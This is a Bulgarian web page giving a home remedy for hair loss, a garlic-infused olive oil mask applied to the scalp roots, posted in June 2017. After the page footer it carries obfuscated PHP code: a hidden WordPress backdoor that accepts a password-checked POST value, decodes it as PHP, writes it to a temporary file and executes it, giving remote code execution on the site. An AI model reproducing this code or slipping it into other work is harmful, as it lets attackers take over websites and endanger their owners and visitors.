Рецепта с чесън срещу косопад | Косопад

Рецепта с чесън срещу косопад

kosa-chesan

Чесънът е сред най- полезните природни средства за косата. Заради свойствата си, помага при различни проблеми, свързани както с косъма, така и със скалпа.

Подобрява растежа на косата, тъй като подхранва корените с полезни витамини и минерали. Прави косата гъста, а корените й по- силни. Стимулира кръвообращението по скалпа. Помага при различни кожни проблеми по кожата на главата, заради антибактериалното си действие.

Има различни рецепти за коса с чесъна в главната роля, в зависимост от проблема. Днес ви предлагаме комбинация, която е изключително полезна при косопад. Също така, ефективно помага при увредена коса.

kosa-chesan-zehtin

За да приготвим сместа, са необходими:

– две скилидки чесън
– 8 с. л. зехтин (най- добре да е екстра върджин)

Белим скилидките чесън и ги слагаме в тиган. Заливаме ги с определеното количество зехтин. Котлонът е на слаб огън. Когато започне да мирише на олио, махаме.

Оставяме да изстине. След това пресипваме в съд (шише, буркан), който се затваря херметически. Слагаме да престои на тъмно поне за едно денонощие.

Употреба:
Най- добре е да се маже преди лягане. Взимаме малко количество и нанасяме в корените с масажиращи движения. След това се задушава с шапка за баня или найлон, които могат да се увият допълнително с кърпа.
Може да преспите така и да измиете косата си на следващия ден. Или след като престоите така поне 2 часа, да измиете. Това е минималният срок.

Препоръчва се маската да се прави по 3 пъти в седмицата. Ако обаче косата започне да се омазнява по- бързо, може да се намали до веднъж или 2 пъти в седмицата.

08. юни 2017 19:34:46 от Надя Колева
Категории: Рецепти при косопад | Етикети: , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}